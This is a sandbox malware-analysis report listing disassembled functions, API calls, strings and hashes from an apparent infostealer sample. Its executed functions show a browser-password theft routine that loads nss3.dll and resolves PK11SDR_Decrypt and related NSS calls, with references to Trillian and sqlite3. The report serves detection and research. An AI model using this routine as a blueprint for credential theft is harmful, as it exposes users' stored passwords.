                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                            • String ID:
                                                            • API String ID: 1479990042-0
                                                            • Opcode ID: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                            • Instruction ID: 6920bf835a9bb06566ba915c59caace60c79acb7cf9a25d2f41614c9f7770f55
                                                            • Opcode Fuzzy Hash: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                            • Instruction Fuzzy Hash: D411ECB5900208AFDB10DFE5D985AEEB7F8FB49314B10446AE505E7200D7B4DA458B64
                                                            Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00406640
                                                              • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                              • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                              • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                            • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                            • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset$memcmp
                                                            • String ID: Ul@
                                                            • API String ID: 270934217-715280498
                                                            • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                            • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                            • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                            • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                            Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75D50A60), ref: 00408EBE
                                                            • sprintf.MSVCRT ref: 0040B929
                                                            • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408E31
                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                            • sprintf.MSVCRT ref: 0040B953
                                                            • _mbscat.MSVCRT ref: 0040B966
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                            • String ID:
                                                            • API String ID: 203655857-0
                                                            • Opcode ID: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                            • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                            • Opcode Fuzzy Hash: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                            • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                            Function 0040ADC5 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040ADE8
                                                            • memset.MSVCRT ref: 0040ADFE
                                                              • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                              • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                            • sprintf.MSVCRT ref: 0040AE28
                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75D50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75D50A60), ref: 00406D4D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                            • String ID: </%s>
                                                            • API String ID: 3699762281-259020660
                                                            • Opcode ID: 8cab70514fe5aa4f21475794247a492732dcbe2e03c6ed67b3b3c257d80e3403
                                                            • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                            • Opcode Fuzzy Hash: 8cab70514fe5aa4f21475794247a492732dcbe2e03c6ed67b3b3c257d80e3403
                                                            • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                            Function 00413FCA Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 38stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strcmp
                                                            • String ID: PD$TeE$deE
                                                            • API String ID: 1004003707-348433437
                                                            • Opcode ID: b168b97d260a06ffe55e63cbe9266a09f7a3433437ec06cc1adb70f16aad6971
                                                            • Instruction ID: 1b7d79a148b7aab314638b0311f02dbb1208d801817e00b7b438fbb38b5f3a9a
                                                            • Opcode Fuzzy Hash: b168b97d260a06ffe55e63cbe9266a09f7a3433437ec06cc1adb70f16aad6971
                                                            • Instruction Fuzzy Hash: 1BF0B433E049214BEB150919AC01396A395DB89736F27573BFC51D7192D328CCC78AC8
                                                            Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _ultoasprintf
                                                            • String ID: %s %s %s
                                                            • API String ID: 432394123-3850900253
                                                            • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                            • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                            • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                            • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                            Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadMenuA.USER32(00000000), ref: 00409078
                                                            • sprintf.MSVCRT ref: 0040909B
                                                              • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                              • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                              • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                              • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                              • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                            • String ID: menu_%d
                                                            • API String ID: 1129539653-2417748251
                                                            • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                            • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                            • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                            • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                            Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • failed memory resize %u to %u bytes, xrefs: 00411706
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _msizerealloc
                                                            • String ID: failed memory resize %u to %u bytes
                                                            • API String ID: 2713192863-2134078882
                                                            • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                            • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                            • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                            • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                            Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                                            • strrchr.MSVCRT ref: 00409808
                                                            • _mbscat.MSVCRT ref: 0040981D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileModuleName_mbscatstrrchr
                                                            • String ID: _lng.ini
                                                            • API String ID: 3334749609-1948609170
                                                            • Opcode ID: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                            • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                            • Opcode Fuzzy Hash: ef02889c57b29374549b5c1aa1c0392ef6eb8eedf2cf02011a8dcbac94fb250b
                                                            • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                            Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                            • _mbscat.MSVCRT ref: 004070FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscat$_mbscpystrlen
                                                            • String ID: sqlite3.dll
                                                            • API String ID: 1983510840-1155512374
                                                            • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                            • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                            • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                            • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                            Function 004073CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                            • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: LongWindow
                                                            • String ID: MZ@
                                                            • API String ID: 1378638983-2978689999
                                                            • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                            • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                            • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                            • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                            Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString
                                                            • String ID: A4@$Server Details
                                                            • API String ID: 1096422788-4071850762
                                                            • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                            • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                            • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                            • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                            Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                            • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                            • memset.MSVCRT ref: 0042C932
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID:
                                                            • API String ID: 438689982-0
                                                            • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                            • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                            • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                            • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                            Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strlen.MSVCRT ref: 0040849A
                                                            • memset.MSVCRT ref: 004084D2
                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,76BAE430,?,00000000), ref: 0040858F
                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,76BAE430,?,00000000), ref: 004085BA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FreeLocalmemcpymemsetstrlen
                                                            • String ID:
                                                            • API String ID: 3110682361-0
                                                            • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                            • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                            • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                            • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                            Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                            • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                            • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID:
                                                            • API String ID: 3510742995-0
                                                            • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                            • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                            • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                            • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                            Function 0040998E Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099A3
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099CC
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099ED
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 00409A0E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$memset
                                                            • String ID:
                                                            • API String ID: 1860491036-0
                                                            • Opcode ID: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                                            • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                            • Opcode Fuzzy Hash: 44f1797246307b9714e18617c58d8f8874aa2206c052adc2795802e4b5edafa2
                                                            • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                            Function 0040796E Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strlen.MSVCRT ref: 0040797A
                                                            • free.MSVCRT ref: 0040799A
                                                              • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                              • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,75D50A60,00407A43,00000001,?,00000000,75D50A60,00407DBD,00000000,?,?), ref: 00406F64
                                                              • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                            • free.MSVCRT ref: 004079BD
                                                            • memcpy.MSVCRT(?,?,?,00000001,?,00000000,?,?,00407E04,?,00000000,?,?), ref: 004079DD
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$memcpy$mallocstrlen
                                                            • String ID:
                                                            • API String ID: 3669619086-0
                                                            • Opcode ID: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                            • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                            • Opcode Fuzzy Hash: 3e3945e45698e8c0ed6e18000fb0620d4112953eee6231efe07dba118771d5c8
                                                            • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59

                                                            Executed Functions

                                                            Function 00410C4C Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 93libraryloaderstringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 00410C6D
                                                              • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                                              • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                                              • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                                              • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                                              • Part of subcall function 00405EC5: _mbscpy.MSVCRT(?,?), ref: 0040607A
                                                              • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                                              • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
                                                            • memset.MSVCRT ref: 00410CB4
                                                            • strlen.MSVCRT ref: 00410CBE
                                                            • strlen.MSVCRT ref: 00410CCC
                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
                                                            • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                                            • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                                            • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                                            • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                                            • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                                            • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                                              • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
                                                              • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.316874372348.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.316874372348.000000000041B000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                                            • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                            • API String ID: 2719586705-3659000792
                                                            • Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
